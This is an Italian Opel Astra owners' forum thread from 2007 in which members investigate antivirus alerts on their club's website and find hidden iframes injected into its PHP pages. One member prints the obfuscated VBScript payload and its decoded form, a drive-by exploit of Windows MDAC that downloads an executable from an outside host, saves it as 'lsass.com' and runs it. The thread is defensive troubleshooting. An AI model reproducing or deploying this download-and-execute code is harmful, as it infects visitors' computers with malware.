virus nel sito del club?

Qui parliamo di informatica e della tecnologia in genere

Moderatori: Moderatori, Moderatore Mensile

Messaggiodi gaspy75 » 21/09/2007, 9:37

jeremj ha scritto:
Da dove??
Così lo sanno anche gli altri. ;)


Dal pannello Opzioni del software antivirus.
EX : 5P Cosmo, 1.9CDTI 150CV My'06, Ultra Blue, Cerchi 17" Sport 225/45, CD30 MP3, Vetri Post. Elettrici
EX Privata : GTC 1.6 Turbo 180cv, Cosmo My08, Black Sapphire, Cerchi 18" Sport,Bi-Xeno,ECC, CC,GID,Kit OPC 1,ParkPilot,CD30 MP3,Estensione Garanzia 2+2
Ora: Peugeot 5008 1.6 HDi 110cv Tecno FAP Robotizzato 6M, Cerchi 17" Quark, pacchetto specchietti + sensori posteggio, tetto in vetro oscurati e vetri neri
gaspy75
Astrista scrivano
Astrista scrivano
 
Messaggi: 3140
Iscritto il: 14/04/2006, 7:51
Località: Milano Sud
La tua Astra: Astra H
Caratteristiche: 1.9 CDTI 150cv
Ordinata: 5008
Altra Opel: 1.6 Turbo 180cv GTC
Umore: Vario

Messaggiodi jeremj » 21/09/2007, 11:02

gaspy75 ha scritto:
jeremj ha scritto:
Da dove??
Così lo sanno anche gli altri. ;)


Dal pannello Opzioni del software antivirus.


Allora su F-SECURE non ho trovato nulla, proverò stasera a vedere se c'è su ANTIVIR :cry:
ASTRA J CDTI 1.7 125CV COSMO TECHNICAL GREY, COSMO PACK, NAVI900, CERCHI18", COMPUTER DI BORDO, SENSORI DI PARCHEGGIO POSTERIORI, RUOTINO DI SCORTA, BLUETOOTH, CLIMA AUTOMATICO BI-ZONA, CRUISE CONTROL, RIBBON JET BLACK, RETROVISORE ELETTROCROMATICO, SIGHT&LIGHT PACK, POGGIATESTA ATTIVI GUIDA/PASS, 3 ANNI GARANZIA

La mia ex Astrina: Astra H 1.7 CDTI 101CV ENJOY - STAR SILVER, CLIMA ECC+GID, C.D.B., CHECK CONTROL, AQS, PLACCHE BATTITACCO

Ho perso una grande amico, ciao Marco rimarrai sempre nel mio cuore :-(
viewtopic.php?f=16&t=20937
Avatar utente
jeremj
Moderatore Mensile
Moderatore Mensile
 
Messaggi: 2732
Iscritto il: 20/10/2005, 0:03
Località: Cagliari
La tua Astra: Astra J
Caratteristiche: 1.7CDTI 125cv

Messaggiodi Gianfy » 21/09/2007, 20:39

gaspy75 ha scritto:
Togliendo l'opzione Heuristic





Scusate ma veramente, ho appena dovuto riformattare tutto proprio perchè l'opzione Heuristic non era attivata e ho beccato un virus.....
non credo proprio che andrò a rimuoverla.....
credo invece che ci potrebbe essere qualche problema dove il sito è ospitato.....
ex:
Astra 1.7 CDTI 101 cv 5p Cosmo my08 + ECC+ GID + CD30MP3+ CC + Comfort Seat Pack2. Black Sapphire + Check control A.M. + Presa 12v nel bagagliaio A.M.
Pneumatici Estivi: Bridgestone Turanza ER300 205/55-16 V
Pneumatici Invernali: Pirelli Snow Control 205/55-16 H

ora:
KIA Niro Urban HEV Midnight Blue
Gianfy
Astrista
Astrista
 
Messaggi: 370
Iscritto il: 12/09/2007, 17:15
Località: Vicenza
La tua Astra: Astra H
Caratteristiche: 5P

Messaggiodi badnoise » 24/09/2007, 10:36

tra l'altro anche google lo segnala come sito a rischio... provate a cercare astra h forum e guardate il risultato...
* * * * * * * * * * * * * * * * * * * * * * * * *
Cordialmente,
Carlo

ASTRA 1.7 CDTI 80CV Enjoy (Giugno 2004) - Silver Lightning - fendinebbia - CD30MP3 con 7 casse

A.M.: Bracciolo centrale originale opel - Cassetto climatizzato - Cruise Control - CDB A.M. & Check Control - Alzacristalli a chiave - Portaocchiali - Luci di posizione a Led Bianchi - Ambient Light -centralina genercom - Mak Veleno 16" - Amplificatore 4x80W Fiam (no remote!) - Luci maniglie portiere
Avatar utente
badnoise
Astrista
Astrista
 
Messaggi: 390
Iscritto il: 14/03/2006, 21:51
Località: Cuneo

Messaggiodi Roll » 24/09/2007, 10:40

Confermo.... GOOGLE lo segnala come un sito pericoloso e non ti ci fa entrare.... invece se ci entro dal mio solito collegamento al forum ci entra tranquillamente.
OPEL ASTRA H 1.7 CDTI 101cv 16v COSMO - NERA - 5 PORTE - SEDILI SPORTIVI PELLE/TESSUTO - VETRI Post. ELETTRICI - CERCHI 17" 5 Razze Sport 225/45-R17 - CRUISE CONTROL - QHS - RADIO CD30 MP3 - GID - COMPUTER DI BORDO - CHECK CONTROL - CLIMA ELETTRONICO AUTOMATICO ECC - RUOTA DI SCORTA NORMALE - ASSETTO SPORTIVO (-1,5 Cm).
TUNING : VOLANTE OPC - PEDALIERA OPC in ALLUMINIO - ANTENNINO Alluminio 9 Cm - SCRITTE POSTERIORI ELIMINATE - TENDINA SCURA LUNOTTO .
*** Se Ciò Che Ti Capita Nella Vita Non Ti Uccide.... Ti Rende Più Forte.... Guarda Avanti !! ***
Avatar utente
Roll
Astrista D.O.C.
Astrista D.O.C.
 
Messaggi: 1679
Iscritto il: 28/11/2005, 17:42
La tua Astra: Astra H

Messaggiodi GreyOwl » 24/09/2007, 10:46

già, è vero!

- Mr. President la sicurezza dei soci è a rischio
- fate decollare gli F-18
- ma è colpa dell'euristica, un virus...
- una nuova cellula terroristica?! e si prepara ad attaccare con armi chimiche? andiamo a defcon 0, armate i missili e fate scorta di patatine

:mrgreen: :mrgreen: :mrgreen: :mrgreen: :mrgreen: :mrgreen: :mrgreen:
[I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] e [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] sono i miei soci - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]
Immagine
I link di Astra Club Italia: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]
ImmagineImmagine
Avatar utente
GreyOwl
SOCIO N° 183
Resp. Club Esteri
Referente Regionale:
Toscana

Collaboratore
 
Messaggi: 4848
Iscritto il: 11/05/2007, 15:09
Località: Prato
La tua Astra: Astra H
Caratteristiche: 5p GTS

Messaggiodi badnoise » 24/09/2007, 10:59

non è che qualcuno ha postato qualche link a programmi o siti non sicuri?
* * * * * * * * * * * * * * * * * * * * * * * * *
Cordialmente,
Carlo

ASTRA 1.7 CDTI 80CV Enjoy (Giugno 2004) - Silver Lightning - fendinebbia - CD30MP3 con 7 casse

A.M.: Bracciolo centrale originale opel - Cassetto climatizzato - Cruise Control - CDB A.M. & Check Control - Alzacristalli a chiave - Portaocchiali - Luci di posizione a Led Bianchi - Ambient Light -centralina genercom - Mak Veleno 16" - Amplificatore 4x80W Fiam (no remote!) - Luci maniglie portiere
Avatar utente
badnoise
Astrista
Astrista
 
Messaggi: 390
Iscritto il: 14/03/2006, 21:51
Località: Cuneo

Messaggiodi jeremj » 24/09/2007, 11:06

E' quello che ho sempre sostenuto l'euristica non c'entra, l'unica cosa che mi viene in mente quando c'è stato il problema delle foto allegate da ELENCIU se non sbaglio che su MSN si correva il rischio di beccare il virus.
Non è che per caso c'è qualche foto nel fotoalbum che fa andare in malore il sito?? :roll:
CONTROLLARE. :grazie
ASTRA J CDTI 1.7 125CV COSMO TECHNICAL GREY, COSMO PACK, NAVI900, CERCHI18", COMPUTER DI BORDO, SENSORI DI PARCHEGGIO POSTERIORI, RUOTINO DI SCORTA, BLUETOOTH, CLIMA AUTOMATICO BI-ZONA, CRUISE CONTROL, RIBBON JET BLACK, RETROVISORE ELETTROCROMATICO, SIGHT&LIGHT PACK, POGGIATESTA ATTIVI GUIDA/PASS, 3 ANNI GARANZIA

La mia ex Astrina: Astra H 1.7 CDTI 101CV ENJOY - STAR SILVER, CLIMA ECC+GID, C.D.B., CHECK CONTROL, AQS, PLACCHE BATTITACCO

Ho perso una grande amico, ciao Marco rimarrai sempre nel mio cuore :-(
viewtopic.php?f=16&t=20937
Avatar utente
jeremj
Moderatore Mensile
Moderatore Mensile
 
Messaggi: 2732
Iscritto il: 20/10/2005, 0:03
Località: Cagliari
La tua Astra: Astra J
Caratteristiche: 1.7CDTI 125cv

Messaggiodi Karu » 24/09/2007, 11:06

O cazzolina.... non so più che fare. Mo' chiedo al Provider :evil:
Marco - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]


My EX Astra: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

My new Ford CMax: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

I link di Astra Club Italia: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

Selle moto più comode e belle? [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]
Avatar utente
Karu
SOCIO N° 1
Socio Fondatore

Socio Fondatore
 
Messaggi: 14269
Iscritto il: 12/08/2005, 20:23
Località: Prov. MB
La tua Astra: Ex Opelista
Umore: Pigro

Messaggiodi Tiamax » 24/09/2007, 11:08

karu sicuramente aruba ti dirà che non è colpa loro ma degli script di php come sempre fanno per smazzarzi le palle loro internamente..
… No, vai via, questo è il nostro gioco e non li vogliamo i tuoi pezzi merdosi. Però se vuoi puoi guardare come giochiamo e se apri le gambe puoi anche fare la galleria…

(noleggiato lo spazio firma ad Alexalive per 1€ al giorno)
_____________________
Fiero di Avere Alexalive come socio e sopratutto di averlo avuto come mio Testimone nozze
Immagine
Avatar utente
Tiamax
Astrista D.O.C.
Astrista D.O.C.
 
Messaggi: 1696
Iscritto il: 06/03/2007, 17:15
Località: Milano Nel Cuore..Ora Parma Tutta la Vita
La tua Astra: Astra H
Caratteristiche: Sw 1.7 CDTI 101Cv
Umore: Tranquillo

Messaggiodi leomenca » 24/09/2007, 16:35

IL PROBLEMA E' IL SEGUENTE:

Purtroppo sulla home del portale abbiamo qualche link non proprio angelico e pulito.

Come al solito diciamo: GRAZIE MICROSOFT!!!

Sono affetti dal problema gli utenti che utilizzano Windows XP SP2/ 2000

Il seguente exploit è dovuto ad un componente di windows dedicato alla gestione remota delle connessioni DB
"Microsoft Data Access Components" msadco.dll

Bollettino Microsoft:
http://www.microsoft.com/italy/technet/ ... 6-014.mspx

Infatti il browser tenta di scaricare dalla seguente fonte :
__http://usuarios.arnet.com.ar/alvarezluque/morgan.html__


al suddetto link il nostro pc tenta di eseguire questo codice:
**************************************
<SCRIPT LANGUAGE="VBS"><!--
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9# (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8# =0tdsjqu"
s=""
For i=1 To Len(d)
b=Mid(d,i,1)
a=Asc(b)
If a=1 Then a=9
If a=2 Then a=10
If a=3 Then a=13
If a=4 Then a=34
If a<=31 And a>=14 Then
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4)
i=i+2
Else
if a>=41 and a<=127 then a=a-1
if a <127 then s=s+Chr(a) else s=s+b
End If
Next
document.write s

-->
**************************************

Che tradotto in codice VBScript è:

**************************************
<script language="VBScript">
on error resume next

dl = "http://usuarios.arnet.com.ar/alvarezluque/flash7.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject("Microsoft.XMLHTTP","")
set S = df.createobject("Adodb.Stream","")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
' Get temp directory and create our destination name
fname1="lsass.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script></body></html><script>
**************************************

In breve,
il pc tenta di scaricare ed eseguire un file exe malevolo identificato dal mio antivirus come: VBS/Psyme

(http://us.mcafee.com/virusInfo/default. ... s_k=100749)

Se non eravate protetti da un antivirus aggiornato siete stati sicuramente infettati a meno che non abbiate effettuato gli aggiornamenti della sicurezza di Windows:

Il file infetto che sta, probabilmente, facendo bagordi sul vostro pc si sarà sicuramente riprodotto in molte cartelle ma potreste cmqe isolarne una copia dalla cartella dei file temporanei internet : il nome del file dovrebbe essere "lsass.com"

Fate una breve ricerca su internet per risolvere il problema e disinfettarvi.

Chi era protetto può star tranquillo.
Ciao a presto

Leomenca.
Ultima modifica di leomenca il 25/09/2007, 0:34, modificato 2 volte in totale.
Astra GTC Cosmo MY05 150HP Black.
Cerchio 5 razze 18"
Kit OPC
Cruise Control
PBox STEINBAUER ;)
leomenca
Neo Astrista
Neo Astrista
 
Messaggi: 11
Iscritto il: 21/07/2006, 13:14

Messaggiodi Karu » 24/09/2007, 16:42

:stica


Ho rimosso un blocco a destra, dove c'erano dei links.


Provate e ditemi se lo dà ancora... altro non saprei.... Leomenca, per caso riesci in un qualche modo a dirmi da dove può arrivare, o meglio, da dove parte il tutto?
Marco - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]


My EX Astra: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

My new Ford CMax: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

I link di Astra Club Italia: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

Selle moto più comode e belle? [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]
Avatar utente
Karu
SOCIO N° 1
Socio Fondatore

Socio Fondatore
 
Messaggi: 14269
Iscritto il: 12/08/2005, 20:23
Località: Prov. MB
La tua Astra: Ex Opelista
Umore: Pigro

Messaggiodi leomenca » 24/09/2007, 16:58

Mi faccio un giro e ti fo sapere.... a presto...
Astra GTC Cosmo MY05 150HP Black.
Cerchio 5 razze 18"
Kit OPC
Cruise Control
PBox STEINBAUER ;)
leomenca
Neo Astrista
Neo Astrista
 
Messaggi: 11
Iscritto il: 21/07/2006, 13:14

Messaggiodi Karu » 24/09/2007, 17:03

Ok, erano delle stringhe nell'index.php che ora ho rimosso.

Tenetemi aggiornato se lo dà ancora. :thx


E grazie mille a Leomenca! :ok
Marco - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]


My EX Astra: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

My new Ford CMax: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

I link di Astra Club Italia: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

Selle moto più comode e belle? [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]
Avatar utente
Karu
SOCIO N° 1
Socio Fondatore

Socio Fondatore
 
Messaggi: 14269
Iscritto il: 12/08/2005, 20:23
Località: Prov. MB
La tua Astra: Ex Opelista
Umore: Pigro

Messaggiodi leomenca » 24/09/2007, 17:17

AHIA...

credo sia il vostro Web Server dove siete ospitati ad avere il problema...

Accendendo al portale infatti il codice HTML della pagina principale è anomalo.

Prima di tutto è inzeppato di TAG iframe nascosti (molto pericolosi e invisibili all'utente) che puntano al virus :
___http://usuarios.arnet.com.ar/EtcEtc____

Penso che sia dovuto al server poichè questi TAG si notano anche dopo il tag di chiusura pagina </HTML>

Credo dobbiate fare o far fare una bella scansione della macchina server...

Per chi nn possiede un antivirus e cmqe vuole navigare tranquillamente sul portale consiglio di fare come di seguito:

Per i possessori di internet Explorer:

Menu Strumenti

Opzioni Internet

Protezione

Selezionare "siti con restrizioni"

Click sul tasto siti

nella casella di testo inserire "http://usuarios.arnet.com.ar"

"Aggiungi" e po "OK"



Click su OK fino ad uscire


Ora non avrete più accesso a quel link malefico
Ultima modifica di leomenca il 24/09/2007, 17:41, modificato 4 volte in totale.
Astra GTC Cosmo MY05 150HP Black.
Cerchio 5 razze 18"
Kit OPC
Cruise Control
PBox STEINBAUER ;)
leomenca
Neo Astrista
Neo Astrista
 
Messaggi: 11
Iscritto il: 21/07/2006, 13:14

Messaggiodi gaspy75 » 24/09/2007, 17:30

Grazie Aruba grazie, grazie aruba graaaazieeeeeeeeee :evil: :evil: :evil: :evil:

Karu è all'opera. Work in progress...
EX : 5P Cosmo, 1.9CDTI 150CV My'06, Ultra Blue, Cerchi 17" Sport 225/45, CD30 MP3, Vetri Post. Elettrici
EX Privata : GTC 1.6 Turbo 180cv, Cosmo My08, Black Sapphire, Cerchi 18" Sport,Bi-Xeno,ECC, CC,GID,Kit OPC 1,ParkPilot,CD30 MP3,Estensione Garanzia 2+2
Ora: Peugeot 5008 1.6 HDi 110cv Tecno FAP Robotizzato 6M, Cerchi 17" Quark, pacchetto specchietti + sensori posteggio, tetto in vetro oscurati e vetri neri
gaspy75
Astrista scrivano
Astrista scrivano
 
Messaggi: 3140
Iscritto il: 14/04/2006, 7:51
Località: Milano Sud
La tua Astra: Astra H
Caratteristiche: 1.9 CDTI 150cv
Ordinata: 5008
Altra Opel: 1.6 Turbo 180cv GTC
Umore: Vario

Messaggiodi Karu » 24/09/2007, 17:31

Ho visto, c'erano quelle righe in tutte le pagine php della root del portale. Ora parrebbe pulito da quegli iframe.

Ci ospita Aruba... ho già segnalato la cosa.


Ora mi dà dei problemi ad accedere alla pagina di admin.php, proprio dopo che ho rimosso quelle stringhe maledette.... :evil:

Provate un po' e ditemi.... :thx
Marco - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]


My EX Astra: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

My new Ford CMax: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

I link di Astra Club Italia: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

Selle moto più comode e belle? [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]
Avatar utente
Karu
SOCIO N° 1
Socio Fondatore

Socio Fondatore
 
Messaggi: 14269
Iscritto il: 12/08/2005, 20:23
Località: Prov. MB
La tua Astra: Ex Opelista
Umore: Pigro

Messaggiodi leomenca » 24/09/2007, 17:42

Bel lavoro KARU


e grazie ARUBA per come manutiene i server :evil:


P.S.

fatevi tutti una bella scansione ANTIVIRUZZZ....
Astra GTC Cosmo MY05 150HP Black.
Cerchio 5 razze 18"
Kit OPC
Cruise Control
PBox STEINBAUER ;)
leomenca
Neo Astrista
Neo Astrista
 
Messaggi: 11
Iscritto il: 21/07/2006, 13:14

Messaggiodi Karu » 24/09/2007, 18:00

Grazie leo, ma è grazie a te.... :ok :thx

In ogni caso... ora pare ok.... ma non posso più entrare nell'admin del portale :( Non capisco dove sia il problema e se qualcosa è stato intaccato.

Leo sei programmatore? PHP lo conosci?

:thx ancora
Marco - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]


My EX Astra: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

My new Ford CMax: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

I link di Astra Club Italia: [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!] - [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]

Selle moto più comode e belle? [I links sono riservati agli utenti registrati. Registrati!Ti aspettiamo!]
Avatar utente
Karu
SOCIO N° 1
Socio Fondatore

Socio Fondatore
 
Messaggi: 14269
Iscritto il: 12/08/2005, 20:23
Località: Prov. MB
La tua Astra: Ex Opelista
Umore: Pigro

Messaggiodi leomenca » 24/09/2007, 18:18

Karu ha scritto:Grazie leo, ma è grazie a te.... :ok :thx

In ogni caso... ora pare ok.... ma non posso più entrare nell'admin del portale :( Non capisco dove sia il problema e se qualcosa è stato intaccato.

Leo sei programmatore? PHP lo conosci?

:thx ancora



Di nulla, è stato un piacere aiutare questo nostro miticcco club. :mrgreen:

Ora ,
mi stai dicendo di non riuscire più ad accedere alla parte Admin del portale giusto? (il CMS è XOOP 2.0? )

Dovresti darmi maggiori informazioni sul tipo di errore e nel caso ricordare cosa hai modificato nei file .php di gestione del portale

Probabilmente il Malware ha danneggiato il codice o in alternativa devi aver modificato qualcosina di troppo durante l'opera di bonifica :oops:

cerca almeno di darmi il nome della pagina che va in errore ed il codice errore...

attendo notizie...ma sto scappando dall'uff...

riprendiamo domani.... o stanotte magari :shock:


Ciao
Astra GTC Cosmo MY05 150HP Black.
Cerchio 5 razze 18"
Kit OPC
Cruise Control
PBox STEINBAUER ;)
leomenca
Neo Astrista
Neo Astrista
 
Messaggi: 11
Iscritto il: 21/07/2006, 13:14

PrecedenteProssimo

Torna a Informatica & Tecnologia

Chi c’è in linea

Visitano il forum: Nessuno e 1 ospite